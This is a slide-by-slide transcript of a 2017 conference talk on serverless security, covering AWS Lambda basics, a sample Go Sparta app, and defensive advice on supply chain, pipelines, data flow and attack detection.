serverless security: a pragmatic primer for builders and defenders
TRANSCRIPT
![Page 1: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/1.jpg)
Velocity San Jose 2017 @WICKETT
SERVERLESS SECURITY: A PRAGMATIC PRIMER
FOR BUILDERS AND DEFENDERS
JAMES WICKETT
![Page 3: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/3.jpg)
Velocity San Jose 2017 @WICKETT
‣ DEVOPS DAYS AUSTIN ORGANIZER
‣ HEAD OF RESEARCH AT SIGNAL SCIENCES
‣ AUTHOR DEVOPS FUNDAMENTALS AT LYNDA.COM
‣ BLOGGER AT THEAGILEADMIN.COM AND LABS.SIGNALSCIENCES.COM
JAMES WICKETT
![Page 4: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/4.jpg)
Velocity San Jose 2017 @WICKETT
Don’t worry, this is not a thinly veiled vendor pitch.
![Page 5: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/5.jpg)
Velocity San Jose 2017 @WICKETT
‣ SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION.
‣ NEW SERVERLESS PATTERNS ARE JUST EMERGING
‣ SECURITY WITH SERVERLESS IS EASIER
‣ SECURITY WITH SERVERLESS IS HARDER
CONCLUSION (1 OF 2)
![Page 6: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/6.jpg)
Velocity San Jose 2017 @WICKETT
‣ FOUR KEY AREAS APPLY TO SERVERLESS SECURITY
‣ SOFTWARE SUPPLY CHAIN SECURITY
‣ DELIVERY PIPELINE SECURITY
‣ DATA FLOW SECURITY
‣ ATTACK DETECTION
‣ LAMBHACK! A VERY VULNERABLE LAMBDA STACK OPEN SOURCE PROJECT
‣ GITHUB.COM/WICKETT/LAMBHACK
CONCLUSION (2 OF 2)
![Page 7: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/7.jpg)
Velocity San Jose 2017 @WICKETT
WHAT IS SERVERLESS?
![Page 8: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/8.jpg)
Velocity San Jose 2017 @WICKETT
MISCONCEPTIONS
![Page 9: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/9.jpg)
Velocity San Jose 2017 @WICKETT
IT’S MARKETING (CLOUD REBRANDED)
![Page 10: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/10.jpg)
Velocity San Jose 2017 @WICKETT
SERVERLESS == NO SERVERS
![Page 11: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/11.jpg)
Velocity San Jose 2017 @WICKETT
SERVERLESS == BACKEND AS A SERVICE
![Page 12: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/12.jpg)
Velocity San Jose 2017 @WICKETT
SERVERLESS == PLATFORM AS A SERVICE
![Page 13: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/13.jpg)
Velocity San Jose 2017 @WICKETT
TK: ADRIANCO QUOTE
![Page 14: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/14.jpg)
Velocity San Jose 2017 @WICKETT
SO, WHAT IS SERVERLESS?
![Page 15: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/15.jpg)
Velocity San Jose 2017 @WICKETT
http://martinfowler.com/articles/serverless.html
@MIKEBROBERTS
![Page 16: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/16.jpg)
Velocity San Jose 2017 @WICKETT
![Page 17: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/17.jpg)
Velocity San Jose 2017 @WICKETT
‣ 2012 - USED TO DESCRIBE BAAS AND CONTINUOUS INTEGRATION SERVICES RUN BY THIRD PARTIES
‣ LATE 2014 - AWS LAUNCHED LAMBDA
‣ JULY 2015 - AWS LAUNCHED API GATEWAY
‣ OCTOBER 2015 - AWS RE:INVENT - THE SERVERLESS COMPANY USING AWS LAMBDA
‣ 2015 TO PRESENT - FRAMEWORKS FORMING
‣ 2016 - GOOGLE CLOUD FUNCTIONS, AZURE FUNCTIONS RELEASED
‣ 2016 - SERVERLESS CONFERENCES STARTED
HISTORY OF SERVERLESS
![Page 18: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/18.jpg)
Velocity San Jose 2017 @WICKETT
VMsHardware Serverless
Inspiration from @adrianco
Waste
Value
![Page 19: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/19.jpg)
Velocity San Jose 2017 @WICKETT
Decomposed Microservice Architecture
![Page 20: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/20.jpg)
Velocity San Jose 2017 @WICKETT
WHAT CAN WE SAY IS SERVERLESS?
![Page 21: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/21.jpg)
Velocity San Jose 2017 @WICKETT
SERVERLESS IS FUNCTIONS AS A SERVICE
(FaaS)
![Page 22: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/22.jpg)
Velocity San Jose 2017 @WICKETT
CONTAINERS ON DEMAND
![Page 23: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/23.jpg)
Velocity San Jose 2017 @WICKETT
SERVERLESS IS (NO MANAGEMENT OF)
SERVERS
![Page 24: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/24.jpg)
Velocity San Jose 2017 @WICKETT
SERVERLESS IS SERVICEFULL
![Page 25: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/25.jpg)
Velocity San Jose 2017 @WICKETT
SERVERLESS IS AN OPINIONATED
FRAMEWORK FOR COMPUTE AND
CONTAINERS
![Page 26: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/26.jpg)
Velocity San Jose 2017 @WICKETT
If you want to lead your company bravely into the new
world, you would do well to focus lot on how serverless will
evolve. - @Cloudopinion
https://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d
![Page 27: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/27.jpg)
Velocity San Jose 2017 @WICKETT
THE CLOUD WAS TO VIRTUALIZATION AS
SERVERLESS WILL BE TO CONTAINERS
![Page 28: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/28.jpg)
Velocity San Jose 2017 @WICKETT
Serverless encourages functions as deploy units, coupled with third party services that allow
running end-to-end applications without worrying about system
operation.
SERVERLESS DEFINITION
![Page 29: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/29.jpg)
Velocity San Jose 2017 @WICKETT
SO, WHAT ARE THE UPSIDES?
![Page 30: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/30.jpg)
Velocity San Jose 2017 @WICKETT
SCALING BUILT IN
![Page 31: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/31.jpg)
Velocity San Jose 2017 @WICKETT
PAY FOR WHAT YOU USE IN 100MS INCREMENTS
![Page 32: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/32.jpg)
Velocity San Jose 2017 @WICKETT
WITH SERVERLESS SYSTEM ADMINISTRATION IS
(MOSTLY) LOWER
![Page 33: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/33.jpg)
Velocity San Jose 2017 @WICKETT
SHORT CIRCUITS OPS AND MOVES INFRASTRUCTURE
RUNTIME CLOSER TO DEVS
![Page 34: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/34.jpg)
Velocity San Jose 2017 @WICKETT
YOU CAN SKIP DOCKERING ALL THE
THINGS!
![Page 35: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/35.jpg)
Velocity San Jose 2017 @WICKETT
GREAT, WHAT’S THE CATCH?
![Page 36: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/36.jpg)
Velocity San Jose 2017 @WICKETT
Ops burden to rationalize serverless model
@patrickdebois
![Page 37: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/37.jpg)
Velocity San Jose 2017 @WICKETT
![Page 38: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/38.jpg)
Velocity San Jose 2017 @WICKETT
VENDOR LOCK-IN
![Page 39: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/39.jpg)
Velocity San Jose 2017 @WICKETT
MONITORING
![Page 40: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/40.jpg)
Velocity San Jose 2017 @WICKETT
LOGGING
![Page 41: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/41.jpg)
Velocity San Jose 2017 @WICKETT
RELIABILITY
![Page 42: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/42.jpg)
Velocity San Jose 2017 @WICKETT
‣ APP NEEDS LARGE LOCAL DISK SPACE
‣ LONG RUNNING JOBS
‣ BIG I/O TASKS
‣ LATENCY SENSITIVE REQUESTS THAT CAN’T WAIT FOR THE COLD-STARTUP TIME
SERVERLESS DEAL KILLERS (PROBABLY)
![Page 43: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/43.jpg)
Velocity San Jose 2017 @WICKETT
SERVERLESS USE CASES
![Page 44: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/44.jpg)
Velocity San Jose 2017 @WICKETT http://martinfowler.com/articles/serverless.html
MESSAGE PROCESSING
![Page 45: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/45.jpg)
Velocity San Jose 2017 @WICKETT http://martinfowler.com/articles/serverless.html
API GATEWAY
![Page 46: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/46.jpg)
Velocity San Jose 2017 @WICKETT
WEB APPLICATIONS
![Page 47: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/47.jpg)
Velocity San Jose 2017 @WICKETT
CI/CD auth
wordpress scraper
event ingestion chatbots
load testing
MORE SERVERLESS USE CASES
![Page 48: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/48.jpg)
Velocity San Jose 2017 @WICKETT
Security
![Page 49: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/49.jpg)
Velocity San Jose 2017 @WICKETT
LETS TRY A SAMPLE APPLICATION IN AWS
![Page 50: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/50.jpg)
Velocity San Jose 2017 @WICKETT
‣ SERVERLESS
‣ APEX
‣ GO SPARTA
‣ KAPPA
STEP 1: PICK A FRAMEWORK
![Page 51: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/51.jpg)
Velocity San Jose 2017 @WICKETT
![Page 52: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/52.jpg)
Velocity San Jose 2017 @WICKETT
‣ GOLANG!
‣ AWS LAMBDA SUPPORTS BRING YOUR OWN BINARY
‣ SPARTA WRAPS YOUR COMPILED BINARY WITH A NODE.JS SHIM
‣ GO SPARTA ALSO HANDLES ALL THE OTHER AWS SERVICES YOUR APP CONSUMES
GO SPARTA
![Page 53: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/53.jpg)
Velocity San Jose 2017 @WICKETT
‣ CLOUDWATCH EVENTS AND LOGS
‣ DYNAMODB, KINESIS,
‣ S3
‣ SES, SNS
‣ API GATEWAY CREATION
GO SPARTA INCLUDES
![Page 54: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/54.jpg)
Velocity San Jose 2017 @WICKETT
‣ BUILD A WORD CLOUD GENERATOR
‣ ABLE TO CONSUME 3RD PARTY APIS FOR TEXT SOURCES
‣ RETURN JSON WITH COUNTS OF WORDS IN TEXT
‣ KEEP IT SIMPLE
STEP 2: IDEA!
![Page 55: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/55.jpg)
Velocity San Jose 2017 @WICKETT
‣ (USING GO SPARTA FOR THE FRAMEWORK)
‣ LAMBDA
‣ S3
‣ API GATEWAY
STEP 3: DESIGN AND ARCHITECTURE
![Page 56: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/56.jpg)
Velocity San Jose 2017 @WICKETT
![Page 57: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/57.jpg)
Velocity San Jose 2017 @WICKETT
STEP 4: WRITE THE HANDLER
![Page 58: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/58.jpg)
Velocity San Jose 2017 @WICKETT
STEP 5: SETUP API GATEWAY
![Page 59: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/59.jpg)
Velocity San Jose 2017 @WICKETT
STEP 6: SET THE CONFIG DETAILS
![Page 60: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/60.jpg)
Velocity San Jose 2017 @WICKETT
STEP 7: PROVISION YOUR APP!
![Page 61: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/61.jpg)
Velocity San Jose 2017 @WICKETT
STEP 8: SETUP STRICT IAM POLICIES
![Page 62: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/62.jpg)
Velocity San Jose 2017 @WICKETT
STEP 9: GIVE UP AND SET LOOSE IAM POLICIES, PROMISE TO FIX LATER
![Page 63: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/63.jpg)
Velocity San Jose 2017 @WICKETT
STEP 10: PROVISION YOUR APP!
![Page 64: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/64.jpg)
Velocity San Jose 2017 @WICKETT
APP IN AWS CONSOLE
![Page 65: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/65.jpg)
Velocity San Jose 2017 @WICKETT
TEST LAMBDA EXEC IN CONSOLE
FIRST RUN OF 343MS
![Page 66: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/66.jpg)
Velocity San Jose 2017 @WICKETT
SECOND RUN ONLY TOOK 84MS
![Page 67: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/67.jpg)
Velocity San Jose 2017 @WICKETT
API GATEWAY IN CONSOLE
![Page 68: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/68.jpg)
Velocity San Jose 2017 @WICKETT
API GATEWAY EXECUTION IN CONSOLE
![Page 69: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/69.jpg)
Velocity San Jose 2017 @WICKETT
RETURNED JSON
![Page 70: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/70.jpg)
Velocity San Jose 2017 @WICKETT
MONITORING LAMBDA IN CONSOLE
![Page 71: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/71.jpg)
Velocity San Jose 2017 @WICKETT
WHAT I LEARNED ABOUT SERVERLESS SECURITY
![Page 72: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/72.jpg)
Velocity San Jose 2017 @WICKETT
SECURITY
![Page 73: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/73.jpg)
Velocity San Jose 2017 @WICKETT
![Page 74: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/74.jpg)
Velocity San Jose 2017 @WICKETT
‣ SECURE SOFTWARE SUPPLY CHAIN
‣ DELIVERY PIPELINE
‣ DATA FLOW SECURITY
‣ ATTACK DETECTION
FOUR AREAS OF SERVERLESS SECURITY
![Page 75: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/75.jpg)
Velocity San Jose 2017 @WICKETT source: @devsecops
![Page 76: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/76.jpg)
Velocity San Jose 2017 @WICKETT
‣ THE CODE YOU WRITE (AND LIBS) IS YOUR SURFACE AREA NOW
‣ CHANGE FROM THE PAST (E.G. SHELLSHOCK, HEARTBLEED) OF THE NUMEROUS FIREDRILLS OUR INDUSTRY HAD TO ENDURE DUE TO INHERITANCE
SURFACE AREA REDUCTION
![Page 77: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/77.jpg)
Velocity San Jose 2017 @WICKETT
‣ TLS CONTROL TO THE PROVIDER
‣ ROUTING CONTROL TO THE PROVIDER
‣ CONSUMPTION OF THIRD PARTY SERVICES
‣ IAM ROLES AND POLICY CONFUSION
SURFACE AREA EXPANSION
![Page 78: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/78.jpg)
Velocity San Jose 2017 @WICKETT
SSL / TLS FROM THE PROVIDER
![Page 79: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/79.jpg)
Velocity San Jose 2017 @WICKETT
OLD WAY
NEW WAY
![Page 80: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/80.jpg)
Velocity San Jose 2017 @WICKETT
ROUTING FROM THE PROVIDER
![Page 81: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/81.jpg)
Velocity San Jose 2017 @WICKETT
ROUTING THE OLD WAY
![Page 82: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/82.jpg)
Velocity San Jose 2017 @WICKETT
ROUTING THE NEW WAY
![Page 83: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/83.jpg)
Velocity San Jose 2017 @WICKETT
Lambda + s3 + kinesis + DynamoDB +
cloudformation + API Gateway + Auth0
SERVICE AND 3RD PARTY EXPANSION
![Page 84: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/84.jpg)
Velocity San Jose 2017 @WICKETT https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds
IAM ROLES AND POLICIES
![Page 85: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/85.jpg)
Velocity San Jose 2017 @WICKETT
Recommendation: Use a third-party service to monitor for provider
config changes
![Page 86: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/86.jpg)
Velocity San Jose 2017 @WICKETT
‣ DISABLE ROOT ACCESS KEYS
‣ MANAGE USERS WITH PROFILES
‣ SECURE YOUR KEYS IN YOUR DEPLOY SYSTEM
‣ SECURE KEYS IN DEV SYSTEM
‣ USE PROVIDER MFA
USE GOOD HYGIENE WITH YOUR PROVIDER
![Page 87: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/87.jpg)
Velocity San Jose 2017 @WICKETT
DELIVERY PIPELINE SECURITY
![Page 88: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/88.jpg)
Velocity San Jose 2017 @WICKETT
![Page 89: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/89.jpg)
Velocity San Jose 2017 @WICKETT
UNIT TESTING
![Page 90: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/90.jpg)
Velocity San Jose 2017 @WICKETT
EASIER TO MOCK
HARDER TO MOCK
![Page 91: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/91.jpg)
Velocity San Jose 2017 @WICKETT
UNIT TESTING EVEN MORE CRITICAL AS
INTEGRATION TESTING IN DEV IS
HARDER
![Page 92: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/92.jpg)
Velocity San Jose 2017 @WICKETT
‣ USE OF A STAGING OR PRE-PROD ENV
‣ END TO END SYNTHETIC INTEGRATION TESTS
‣ ALL THE USUAL SUSPECTS
INTEGRATION TESTING
![Page 93: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/93.jpg)
Velocity San Jose 2017 @WICKETT
CONFIGURATION IS PART OF DELIVERY
![Page 94: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/94.jpg)
Velocity San Jose 2017 @WICKETT
‣ ONLY DEV KEYS CAN PUSH TO ‘DEV’
‣ ONLY BUILD/DEPLOY SYSTEM CAN PUSH TO PRE-PROD
‣ INTEGRATION TESTS MUST PASS IN THIS ENV
‣ SECURITY VALIDATION MUST TAKE PLACE BEFORE PROMOTION
‣ ALLOW PUSH TO PROD, ONLY BY DEPLOY SYSTEM
GOOD PIPELINE PRACTICES
![Page 95: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/95.jpg)
Velocity San Jose 2017 @WICKETT
‣ BDD-SECURITY - GITHUB.COM/CONTINUUMSECURITY/BDD-SECURITY
‣ GAUNTLT - GAUNTLT.ORG
‣ GITHUB.COM/GAUNTLT/GAUNTLT
‣ DOCKER RECOMMENDED
SECURITY TESTING TOOLS
![Page 96: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/96.jpg)
Velocity San Jose 2017 @WICKETT
http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015
GAUNTLT WORKSHOP IN 9 EXAMPLES
![Page 97: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/97.jpg)
Velocity San Jose 2017 @WICKETT
DATA FLOW‣ DEVELOPMENT
‣ DATA FLOW DIAGRAMS
‣ THREAT MODELING
‣ RUNTIME
‣ LOGGING
‣ CUSTOM MONITORS/METRICS
![Page 98: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/98.jpg)
Velocity San Jose 2017 @WICKETT
Your provider is responsible for the underlying infrastructure
and services. You are responsible for ensuring you use the services in a secure manner.
https://read.acloud.guru/adopting-serverless-architectures-and-
security-254a0c12b54a
![Page 99: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/99.jpg)
Velocity San Jose 2017 @WICKETT
‣ SPOOFING CONSUMED RESOURCES
‣ DENIAL OF SERVICE
‣ TIMEOUTS
